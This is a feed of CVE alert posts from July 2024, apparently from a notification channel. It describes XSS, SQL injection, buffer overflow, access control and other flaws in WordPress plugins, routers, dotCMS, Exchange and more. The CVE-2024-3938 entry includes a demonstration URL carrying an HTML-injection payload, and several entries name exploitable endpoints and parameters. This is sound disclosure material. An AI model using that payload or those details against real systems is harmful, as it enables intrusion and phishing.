🚨 CVE-2024-1804The Tutor LMS – Migration Tool plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tutor_import_from_xml function in all versions up to, and including, 2.2.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to import courses.🎖@cveNotify |
|
| 2024-07-27 02:37:24 |
🚨 CVE-2024-1798The Tutor LMS – Migration Tool plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the tutor_lp_export_xml function in all versions up to, and including, 2.2.0. This makes it possible for unauthenticated attackers to export courses, including private and password protected courses.🎖@cveNotify |
|
| 2024-07-26 22:37:25 |
🚨 CVE-2024-37034An issue was discovered in Couchbase Server before 7.2.5 and 7.6.0 before 7.6.1. It does not ensure that credentials are negotiated with the Key-Value (KV) service using SCRAM-SHA when remote link encryption is configured for Half-Secure.🎖@cveNotify |
|
| 2024-07-26 22:37:24 |
🚨 CVE-2024-0519Out of bounds memory access in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-07-26 21:37:32 |
🚨 CVE-2024-41114streamlit-geospatial is a streamlit multipage app for geospatial applications. Prior to commit c4f81d9616d40c60584e36abb15300853a66e489, the `palette` variable on line 430 in `pages/1_📷_Timelapse.py` takes user input, which is later used in the `eval()` function on line 435, leading to remote code execution. Commit c4f81d9616d40c60584e36abb15300853a66e489 fixes this issue.🎖@cveNotify |
|
| 2024-07-26 21:37:25 |
🚨 CVE-2023-39667D-Link DIR-868L fw_revA_1-12_eu_multi_20170316 was discovered to contain a buffer overflow via the param_2 parameter in the FUN_0000acb4 function.🎖@cveNotify |
|
| 2024-07-26 21:37:24 |
🚨 CVE-2021-3182D-Link DCS-5220 devices have a buffer overflow. NOTE: This vulnerability only affects products that are no longer supported by the maintainer🎖@cveNotify |
|
| 2024-07-26 20:37:32 |
🚨 CVE-2024-38512A privilege escalation vulnerability was discovered in XCC that could allow an authenticated XCC user with elevated privileges to perform command injection via specially crafted IPMI commands.🎖@cveNotify |
|
| 2024-07-26 20:37:26 |
🚨 CVE-2024-38511A privilege escalation vulnerability was discovered in an upload processing functionality of XCC that could allow an authenticated XCC user with elevated privileges to perform command injection via specially crafted file uploads.🎖@cveNotify |
|
| 2024-07-26 20:37:25 |
🚨 CVE-2024-38508A privilege escalation vulnerability was discovered in the web interface or SSH captive command shell interface of XCC that could allow an authenticated XCC user with elevated privileges to perform command injection via a specially crafted request.🎖@cveNotify |
|
| 2024-07-26 20:37:24 |
🚨 CVE-2024-24478An issue in Wireshark before 4.2.0 allows a remote attacker to cause a denial of service via the packet-bgp.c, dissect_bgp_open(tvbuff_t*tvb, proto_tree*tree, packet_info*pinfo), optlen components. NOTE: this is disputed by the vendor because neither release 4.2.0 nor any other release was affected.🎖@cveNotify |
|
| 2024-07-26 20:07:26 |
🚨 CVE-2020-25213The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.🎖@cveNotify |
|
| 2024-07-26 20:07:25 |
🚨 CVE-2020-1380A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.The security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.🎖@cveNotify |
|
| 2024-07-26 19:37:35 |
🚨 CVE-2024-42007SPX (aka php-spx) through 0.4.15 allows SPX_UI_URI Directory Traversal to read arbitrary files.🎖@cveNotify |
|
| 2024-07-26 19:37:31 |
🚨 CVE-2021-36948Windows Update Medic Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-26 19:37:30 |
🚨 CVE-2021-36741An improper input validation vulnerability in Trend Micro Apex One, Apex One as a Service, OfficeScan XG, and Worry-Free Business Security 10.0 SP1 allows a remote attached to upload arbitrary files on affected installations. Please note: an attacker must first obtain the ability to logon to the product?s management console in order to exploit this vulnerability.🎖@cveNotify |
|
| 2024-07-26 19:37:26 |
🚨 CVE-2021-34473Microsoft Exchange Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-07-26 19:37:25 |
🚨 CVE-2021-31979Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-07-26 19:37:24 |
🚨 CVE-2021-31207Microsoft Exchange Server Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-07-26 19:07:24 |
🚨 CVE-2022-45168An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Bypass of Two-Factor Authentication can occur under the /login/backup_code endpoint and the /api/v1/vdeskintegration/createbackupcodes endpoint, because the application allows a user to generate or regenerate the backup codes before checking the TOTP.🎖@cveNotify |
|
| 2024-07-26 18:37:30 |
🚨 CVE-2024-38872Zohocorp ManageEngine Exchange Reporter Plus versions 5717 and below are vulnerable to the authenticated SQL injection in the monitoring module.🎖@cveNotify |
|
| 2024-07-26 18:37:26 |
🚨 CVE-2023-7271Privilege escalation vulnerability in the NMS moduleImpact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-07-26 18:37:25 |
🚨 CVE-2024-31847An issue was discovered in Italtel Embrace 1.6.4. A stored cross-site scripting (XSS) vulnerability allows authenticated and unauthenticated remote attackers to inject arbitrary web script or HTML into a GET parameter. This reflects/stores the user input without sanitization.🎖@cveNotify |
|
| 2024-07-26 18:37:24 |
🚨 CVE-2024-31844An issue was discovered in Italtel Embrace 1.6.4. The server does not properly handle application errors. In some cases, this leads to a disclosure of information about the server. An unauthenticated user is able craft specific requests in order to make the application generate an error. Inside an error message, some information about the server is revealed, such as the absolute path of the source code of the application. This kind of information can help an attacker to perform other attacks against the system. This can be exploited without authentication.🎖@cveNotify |
|
| 2024-07-26 18:07:24 |
🚨 CVE-2022-45176An issue was discovered in LIVEBOX Collaboration vDesk through v018. Stored Cross-site Scripting (XSS) can occur under the /api/v1/getbodyfile endpoint via the uri parameter. The web application (through its vShare functionality section) doesn't properly check parameters, sent in HTTP requests as input, before saving them on the server. In addition, crafted JavaScript content can then be reflected back to the end user and executed by the web browser.🎖@cveNotify |
|
| 2024-07-26 17:37:32 |
🚨 CVE-2024-41353phpipam 1.6 is vulnerable to Cross Site Scripting (XSS) via app\admin\groups\edit-group.php🎖@cveNotify |
|
| 2024-07-26 17:37:25 |
🚨 CVE-2024-26520An issue in Hangzhou Xiongwei Technology Development Co., Ltd. Restaurant Digital Comprehensive Management platform v1 allows an attacker to bypass authentication and perform arbitrary password resets.🎖@cveNotify |
|
| 2024-07-26 17:37:24 |
🚨 CVE-2023-50700Insecure Permissions vulnerability in Deepin dde-file-manager 6.0.54 and earlier allows privileged operations to be called by unprivileged users via the D-Bus method.🎖@cveNotify |
|
| 2024-07-26 16:07:26 |
🚨 CVE-2024-39673Vulnerability of serialisation/deserialisation mismatch in the iAware module. Impact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-07-26 16:07:25 |
🚨 CVE-2024-39671Access control vulnerability in the security verification module.Impact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-07-26 16:07:24 |
🚨 CVE-2024-39670Privilege escalation vulnerability in the account synchronisation module.Impact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-07-26 15:37:25 |
🚨 CVE-2024-41805Tracks, a Getting Things Done (GTD) web application, is vulnerable to reflected cross-site scripting in versions prior to 2.7.1. Reflected cross-site scripting enables execution of malicious JavaScript in the context of a user’s browser if that user clicks on a malicious link, allowing phishing attacks that could lead to credential theft. Tracks version 2.7.1 is patched. No known complete workarounds are available.🎖@cveNotify |
|
| 2024-07-26 15:37:24 |
🚨 CVE-2024-41670In the module "PayPal Official" for PrestaShop 7+ releases prior to version 6.4.2 and for PrestaShop 1.6 releases prior to version 3.18.1, a malicious customer can confirm an order even if payment is finally declined by PayPal. A logical weakness during the capture of a payment in case of disabled webhooks can be exploited to create an accepted order. This could allow a threat actor to confirm an order with a fraudulent payment support. Versions 6.4.2 and 3.18.1 contain a patch for the issue. Additionally, users enable webhooks and check they are callable.🎖@cveNotify |
|
| 2024-07-26 14:37:36 |
🚨 CVE-2024-6922Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component. An attacker with unauthenticated access to the Automation 360 Control Room HTTPS service (port 443) or HTTP service (port 80) can trigger arbitrary web requests from the server.🎖@cveNotify |
|
| 2024-07-26 14:37:35 |
🚨 CVE-2024-40689IBM InfoSphere Information Server 11.7 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify, or delete information in the back-end database. IBM X-Force ID: 297719.🎖@cveNotify |
|
| 2024-07-26 14:37:31 |
🚨 CVE-2024-3938The "reset password" login page accepted an HTML injection via URL parameters.This has already been rectified via patch, and as such it cannot be demonstrated via Demo site link. Those interested to see the vulnerability may spin up a http://localhost:8082/dotAdmin/#/public/login?resetEmailSent=true&resetEmail=%3Ch1%3E%3Ca%20href%3D%22https:%2F%2Fgoogle.com%22%3ECLICK%20ME%3C%2Fa%3E%3C%2Fh1%3E This will result in a view along these lines: * OWASP Top 10 - A03: Injection * CVSS Score: 5.4 * AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator * https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N&... https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator🎖@cveNotify |
|
| 2024-07-26 14:37:30 |
🚨 CVE-2024-37429Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Hamid Alinia – idehweb Login with phone number allows Stored XSS.This issue affects Login with phone number: from n/a through 1.7.35.🎖@cveNotify |
|
| 2024-07-26 14:37:26 |
🚨 CVE-2024-37428Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Themesgrove WidgetKit allows Stored XSS.This issue affects WidgetKit: from n/a through 2.5.0.🎖@cveNotify |
|
| 2024-07-26 14:37:25 |
🚨 CVE-2024-3165System->Maintenance-> Log Files in dotCMS dashboard is providing the username/password for database connections in the log output. Nevertheless, this is a moderate issue as it requires a backend admin as well as that dbs are locked down by environment. OWASP Top 10 - A05) Insecure DesignOWASP Top 10 - A05) Security MisconfigurationOWASP Top 10 - A09) Security Logging and Monitoring Failure🎖@cveNotify |
|
| 2024-07-26 14:37:24 |
🚨 CVE-2024-3164In dotCMS dashboard, the Tools and Log Files tabs under System → Maintenance Portlet, which is and always has been an Admin portlet, is accessible to anyone with that portlet and not just to CMS Admins. Users that get site admin but not a system admin, should not have access to the System Maintenance → Tools portlet. This would share database username and password under Log Files and download DB Dump and other dotCMS Content under Tools. Nothing in the System → Maintenance should be displayed for users with site admin role. Only system admins must have access to System Maintenance.OWASP Top 10 - A01) Broken Access ControlOWASP Top 10 - A04) Insecure Design🎖@cveNotify |
|
| 2024-07-26 13:37:42 |
🚨 CVE-2024-41460Tenda FH1201 v1.2.0.14 was discovered to contain a stack-based buffer overflow vulnerability via the entrys parameter at ip/goform/RouteStatic.🎖@cveNotify |
|
| 2024-07-26 13:37:41 |
🚨 CVE-2024-41136An authenticated command injection vulnerability exists in the HPE Aruba Networking EdgeConnect SD-WAN gateways Command Line Interface. Successful exploitation of this vulnerability results in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-07-26 13:37:40 |
🚨 CVE-2024-7080A vulnerability was found in SourceCodester Insurance Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /E-Insurance/. The manipulation leads to direct request. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-272365 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-07-26 13:37:37 |
🚨 CVE-2024-41551CampCodes Supplier Management System v1.0 is vulnerable to SQL injection via Supply_Management_System/admin/view_order_items.php?id= .🎖@cveNotify |
|
| 2024-07-26 13:37:36 |
🚨 CVE-2024-22443A vulnerability in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to conduct a server-side prototype pollution attack. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the underlying operating system leading to complete system compromise.🎖@cveNotify |
|
| 2024-07-26 13:37:35 |
🚨 CVE-2024-7067A vulnerability was found in kirilkirkov Ecommerce-Laravel-Bootstrap up to 1f1097a3448ce8ec53e034ea0f70b8e2a0e64a87. It has been rated as critical. Affected by this issue is the function getCartProductsIds of the file app/Cart.php. The manipulation of the argument laraCart leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The name of the patch is a02111a674ab49f65018b31da3011b1e396f59b1. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-272348.🎖@cveNotify |
|
| 2024-07-26 13:37:31 |
🚨 CVE-2024-37445Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in bPlugins Html5 Audio Player allows Stored XSS.This issue affects Html5 Audio Player: from n/a through 2.2.23.🎖@cveNotify |
|
| 2024-07-26 13:37:30 |
🚨 CVE-2024-37433Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in EverPress Mailster allows Reflected XSS.This issue affects Mailster: from n/a through 4.0.9.🎖@cveNotify |
|
| 2024-07-26 13:37:26 |
🚨 CVE-2024-38457Xenforo before 2.2.16 allows CSRF.🎖@cveNotify |
|
| 2024-07-26 13:37:25 |
🚨 CVE-2024-3814The tagDiv Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'single' module in all versions up to, and including, 4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-26 13:07:43 |
🚨 CVE-2024-1724In snapd versions prior to 2.62, when using AppArmor for enforcement of sandbox permissions, snapd failed to restrict writes to the $HOME/binpath. In Ubuntu, when this path exists, it is automatically added tothe users PATH. An attacker who could convince a user to install amalicious snap which used the 'home' plug could use this vulnerabilityto install arbitrary scripts into the users PATH which may then be runby the user outside of the expected snap sandbox and hence allow themto escape confinement.🎖@cveNotify |
|
| 2024-07-26 13:07:42 |
🚨 CVE-2022-32759IBM Security Directory Integrator 7.2.0 and IBM Security Verify Directory Integrator 10.0.0 uses insufficient session expiration which could allow an unauthorized user to obtain sensitive information. IBM X-Force ID: 228565.🎖@cveNotify |
|
| 2024-07-26 13:07:37 |
🚨 CVE-2024-41801OpenProject is open source project management software. Prior to version 14.3.0, using a forged HOST header in the default configuration of packaged installations and using the "Login required" setting, an attacker could redirect to a remote host to initiate a phishing attack against an OpenProject user's account. This vulnerability affects default packaged installation of OpenProject without any additional configuration or modules on Apache (such as mod_security, manually setting a host name, having a fallthrough VirtualHost). It might also affect other installations that did not take care to fix the HOST/X-Forwarded-Host headers. Version 14.3.0 includes stronger protections for the hostname from within the application using the HostAuthorization middleware of Rails to reject any requests with a host name that does not match the configured one. Also, all generated links by the application are now ensured to use the built-in hostname. Users who aren't able to upgrade immediately may use mod_security for Apache2 or manually fix the Host and X-Forwarded-Host headers in their proxying application before reaching the application server of OpenProject. Alternatively, they can manually apply the patch to opt-in to host header protections in previous versions of OpenProject.🎖@cveNotify |
|
| 2024-07-26 13:07:36 |
🚨 CVE-2024-36542Insecure permissions in kuma v2.7.0 allows attackers to access sensitive data and escalate privileges by obtaining the service account's token.🎖@cveNotify |
|
| 2024-07-26 13:07:31 |
🚨 CVE-2024-41806The Open edX Platform is a learning management platform. Instructors can upload csv files containing learner information to create cohorts in the instructor dashboard. These files are uploaded using the django default storage. With certain storage backends, uploads may become publicly available when the uploader uses versions master, palm, olive, nutmeg, maple, lilac, koa, or juniper. The patch in commit cb729a3ced0404736dfa0ae768526c82b608657b ensures that cohorts data uploaded to AWS S3 buckets is written with a private ACL. Beyond patching, deployers should also ensure that existing cohorts uploads have a private ACL, or that other precautions are taken to avoid public access.🎖@cveNotify |
|
| 2024-07-26 13:07:30 |
🚨 CVE-2024-6096In Progress® Telerik® Reporting versions prior to 18.1.24.709, a code execution attack is possible through object injection via an insecure type resolution vulnerability.🎖@cveNotify |
|
| 2024-07-26 13:07:26 |
🚨 CVE-2024-5818The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored DOM-based Cross-Site Scripting via the plugin's Magazine Grid/Slider widget in all versions up to, and including, 1.3.980 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-07-26 13:07:25 |
🚨 CVE-2024-37097Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in UnitedThemes Shortcodes by United Themes allows Reflected XSS.This issue affects Shortcodes by United Themes: from n/a before 5.0.5.🎖@cveNotify |
|
| 2024-07-26 13:07:24 |
🚨 CVE-2024-35656Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Elementor Elementor Pro allows Reflected XSS.This issue affects Elementor Pro: from n/a through 3.21.2.🎖@cveNotify |
|
| 2024-07-26 10:37:26 |
🚨 CVE-2024-35296Invalid Accept-Encoding header can cause Apache Traffic Server to fail cache lookup and force forwarding requests.This issue affects Apache Traffic Server: from 8.0.0 through 8.1.10, from 9.0.0 through 9.2.4.Users are recommended to upgrade to version 8.1.11 or 9.2.5, which fixes the issue.🎖@cveNotify |
|
| 2024-07-26 10:37:25 |
🚨 CVE-2023-38522Apache Traffic Server accepts characters that are not allowed for HTTP field names and forwards malformed requests to origin servers. This can be utilized for request smuggling and may also lead cache poisoning if the origin servers are vulnerable.This issue affects Apache Traffic Server: from 8.0.0 through 8.1.10, from 9.0.0 through 9.2.4.Users are recommended to upgrade to version 8.1.11 or 9.2.5, which fixes the issue.🎖@cveNotify |
|
| 2024-07-26 10:37:24 |
🚨 CVE-2024-7079A flaw was found in the Openshift console. The /API/helm/verify endpoint is tasked to fetch and verify the installation of a Helm chart from a URI that is remote HTTP/HTTPS or local. Access to this endpoint is gated by the authHandlerWithUser() middleware function. Contrary to its name, this middleware function does not verify the validity of the user's credentials. As a result, unauthenticated users can access this endpoint.🎖@cveNotify |
|
| 2024-07-26 09:37:24 |
🚨 CVE-2024-25090Insufficient input validation and sanitation in Profile name & screenname, Bookmark name & description and blogroll name features in all versions of Apache Roller on all platforms allows an authenticated user to perform an XSS attack. Mitigation: if you do not have Roller configured for untrusted users, then you need to do nothing because you trust your users to author raw HTML and other web content. If you are running with untrusted users then you should upgrade to Roller 6.1.3.This issue affects Apache Roller: from 5.0.0 before 6.1.3.Users are recommended to upgrade to version 6.1.3, which fixes the issue.🎖@cveNotify |
|
| 2024-07-26 06:37:25 |
🚨 CVE-2024-6490During testing of the Master Slider WordPress plugin through 3.9.10, a CSRF vulnerability was found, which allows an unauthorized user to manipulate requests on behalf of the victim and thereby delete all of the sliders inside Master Slider WordPress plugin through 3.9.10.🎖@cveNotify |
|
| 2024-07-26 06:37:24 |
🚨 CVE-2024-40897Stack-based buffer overflow vulnerability exists in orcparse.c of ORC versions prior to 0.4.39. If a developer is tricked to process a specially crafted file with the affected ORC compiler, an arbitrary code may be executed on the developer's build environment. This may lead to compromise of developer machines or CI build environments.🎖@cveNotify |
|
| 2024-07-26 05:37:25 |
🚨 CVE-2024-7119A vulnerability, which was classified as critical, has been found in MD-MAFUJUL-HASAN Online-Payroll-Management-System up to 20230911. Affected by this issue is some unknown functionality of the file /employee_viewmore.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-272450 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-26 05:37:24 |
🚨 CVE-2023-49921An issue was discovered by Elastic whereby Watcher search input logged the search query results on DEBUG log level. This could lead to raw contents of documents stored in Elasticsearch to be printed in logs. Elastic has released 8.11.2 and 7.17.16 that resolves this issue by removing this excessive logging. This issue only affects users that use Watcher and have a Watch defined that uses the search input and additionally have set the search input’s logger to DEBUG or finer, for example using: org.elasticsearch.xpack.watcher.input.search, org.elasticsearch.xpack.watcher.input, org.elasticsearch.xpack.watcher, or wider, since the loggers are hierarchical.🎖@cveNotify |
|
| 2024-07-26 04:37:25 |
🚨 CVE-2024-7118A vulnerability classified as critical was found in MD-MAFUJUL-HASAN Online-Payroll-Management-System up to 20230911. Affected by this vulnerability is an unknown functionality of the file /department_viewmore.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The identifier VDB-272449 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-26 04:37:24 |
🚨 CVE-2024-7117A vulnerability classified as critical has been found in MD-MAFUJUL-HASAN Online-Payroll-Management-System up to 20230911. Affected is an unknown function of the file /shift_viewmore.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-272448. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-26 03:37:24 |
🚨 CVE-2024-7116A vulnerability was found in MD-MAFUJUL-HASAN Online-Payroll-Management-System up to 20230911. It has been rated as critical. This issue affects some unknown processing of the file /branch_viewmore.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-272447. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-26 02:37:25 |
🚨 CVE-2024-7115A vulnerability was found in MD-MAFUJUL-HASAN Online-Payroll-Management-System up to 20230911. It has been declared as critical. This vulnerability affects unknown code of the file /designation_viewmore.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-272446 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-07-26 02:37:24 |
🚨 CVE-2024-4447In the System → Maintenance tool, the Logged Users tab surfaces sessionId data for all users via the Direct Web Remoting API (UserSessionAjax.getSessionList.dwr) calls. While this is information that would and should be available to admins who possess "Sign In As" powers, admins who otherwise lack this privilege would still be able to utilize the session IDs to imitate other users.While this is a very small attack vector that requires very high permissions to execute, its danger lies principally in obfuscating attribution; all Sign In As operations are attributed appropriately in the log files, and a malicious administrator could use this information to render their dealings untraceable — including those admins who have not been granted this ability — such as by using a session ID to generate an API token.Fixed in: 24.07.12 / 23.01.20 LTS / 23.10.24v13 LTS / 24.04.24v5 LTS🎖@cveNotify |
|
| 2024-07-26 00:37:24 |
🚨 CVE-2024-38164An improper access control vulnerability in GroupMe allows an a unauthenticated attacker to elevate privileges over a network by convincing a user to click on a malicious link.🎖@cveNotify |
|
| 2024-07-25 21:37:32 |
🚨 CVE-2024-6162A vulnerability was found in Undertow. URL-encoded request path information can be broken for concurrent requests on ajp-listener, causing the wrong path to be processed and resulting in a possible denial of service.🎖@cveNotify |
|
| 2024-07-25 21:37:25 |
🚨 CVE-2024-3164In dotCMS dashboard, the Tools and Log Files tabs under System → Maintenance Portlet, which is and always has been an Admin portlet, is accessible to anyone with that portlet and not just to CMS Admins. Users that get site admin but not a system admin, should not have access to the System Maintenance → Tools portlet. This would share database username and password under Log Files and download DB Dump and other dotCMS Content under Tools. Nothing in the System → Maintenance should be displayed for users with site admin role. Only system admins must have access to System Maintenance.OWASP Top 10 - A01) Broken Access ControlOWASP Top 10 - A04) Insecure Design🎖@cveNotify |
|
| 2024-07-25 21:37:24 |
🚨 CVE-2024-1023A vulnerability in the Eclipse Vert.x toolkit results in a memory leak due to using Netty FastThreadLocal data structures. Specifically, when the Vert.x HTTP client establishes connections to different hosts, triggering the memory leak. The leak can be accelerated with intimate runtime knowledge, allowing an attacker to exploit this vulnerability. For instance, a server accepting arbitrary internet addresses could serve as an attack vector by connecting to these addresses, thereby accelerating the memory leak.🎖@cveNotify |
|
| 2024-07-25 20:37:32 |
🚨 CVE-2024-1724In snapd versions prior to 2.62, when using AppArmor for enforcement of sandbox permissions, snapd failed to restrict writes to the $HOME/binpath. In Ubuntu, when this path exists, it is automatically added tothe users PATH. An attacker who could convince a user to install amalicious snap which used the 'home' plug could use this vulnerabilityto install arbitrary scripts into the users PATH which may then be runby the user outside of the expected snap sandbox and hence allow themto escape confinement.🎖@cveNotify |
|
| 2024-07-25 20:37:26 |
🚨 CVE-2024-37878Cross Site Scripting vulnerability in TWCMS v.2.0.3 allows a remote attacker to execute arbitrary code via the /TWCMS-gh-pages/twcms/runtime/twcms_view/default,index.htm.php" PHP directly echoes parameters input from external sources🎖@cveNotify |
|
| 2024-07-25 20:37:25 |
🚨 CVE-2024-37038CWE-276: Incorrect Default Permissions vulnerability exists that could allow an authenticateduser with access to the device’s web interface to perform unauthorized file and firmwareuploads when crafting custom web requests.🎖@cveNotify |
|
| 2024-07-25 20:37:24 |
🚨 CVE-2024-37037CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘PathTraversal’) vulnerability exists that could allow an authenticated user with access to the device’sweb interface to corrupt files and impact device functionality when sending a crafted HTTPrequest.🎖@cveNotify |
|
| 2024-07-25 20:07:35 |
🚨 CVE-2024-37239Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WPMU DEV Branda allows Stored XSS.This issue affects Branda: from n/a through 3.4.17.🎖@cveNotify |
|
| 2024-07-25 20:07:31 |
🚨 CVE-2024-37223Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Nicdark Restaurant Reservations allows Stored XSS.This issue affects Restaurant Reservations: from n/a through 2.0.🎖@cveNotify |
|
| 2024-07-25 20:07:30 |
🚨 CVE-2024-37217Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in ProWCPlugins Empty Cart Button for WooCommerce allows Stored XSS.This issue affects Empty Cart Button for WooCommerce: from n/a through 1.3.8.🎖@cveNotify |
|
| 2024-07-25 20:07:26 |
🚨 CVE-2024-37216Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Rami Yushuvaev Sketchfab Embed allows Stored XSS.This issue affects Sketchfab Embed: from n/a through 1.5.🎖@cveNotify |
|
| 2024-07-25 20:07:25 |
🚨 CVE-2024-5558CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability exists that couldcause escalation of privileges when an attacker abuses a limited admin account.🎖@cveNotify |
|
| 2024-07-25 20:07:24 |
🚨 CVE-2024-5557CWE-532: Insertion of Sensitive Information into Log File vulnerability exists that could causeexposure of SNMP credentials when an attacker has access to the controller logs.🎖@cveNotify |
|
| 2024-07-25 19:37:35 |
🚨 CVE-2024-1724In snapd versions prior to 2.62, when using AppArmor for enforcement of sandbox permissions, snapd failed to restrict writes to the $HOME/binpath. In Ubuntu, when this path exists, it is automatically added tothe users PATH. An attacker who could convince a user to install amalicious snap which used the 'home' plug could use this vulnerabilityto install arbitrary scripts into the users PATH which may then be runby the user outside of the expected snap sandbox and hence allow themto escape confinement.🎖@cveNotify |
|
| 2024-07-25 19:37:31 |
🚨 CVE-2024-37211Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Ali2Woo Team Ali2Woo Lite allows Reflected XSS.This issue affects Ali2Woo Lite: from n/a through 3.3.5.🎖@cveNotify |
|
| 2024-07-25 19:37:30 |
🚨 CVE-2024-37122Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Biplob Adhikari Accordions allows Stored XSS.This issue affects Accordions: from n/a through 2.3.5.🎖@cveNotify |
|
| 2024-07-25 19:37:26 |
🚨 CVE-2024-37120Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Biplob Adhikari Tabs allows Stored XSS.This issue affects Tabs: from n/a through 4.0.6.🎖@cveNotify |
|
| 2024-07-25 18:37:32 |
🚨 CVE-2024-40873There is a cross-site scripting vulnerability in the SecureAccess administrative console of Absolute Secure Access prior to version 13.07.Attackers with system administrator permissions can interfere with anothersystem administrator’s use of the publishing UI when the administrators areediting the same management object. The scope is unchanged, there is no loss ofconfidentiality. Impact to system availability is none, impact to systemintegrity is high.🎖@cveNotify |
|
| 2024-07-25 18:37:26 |
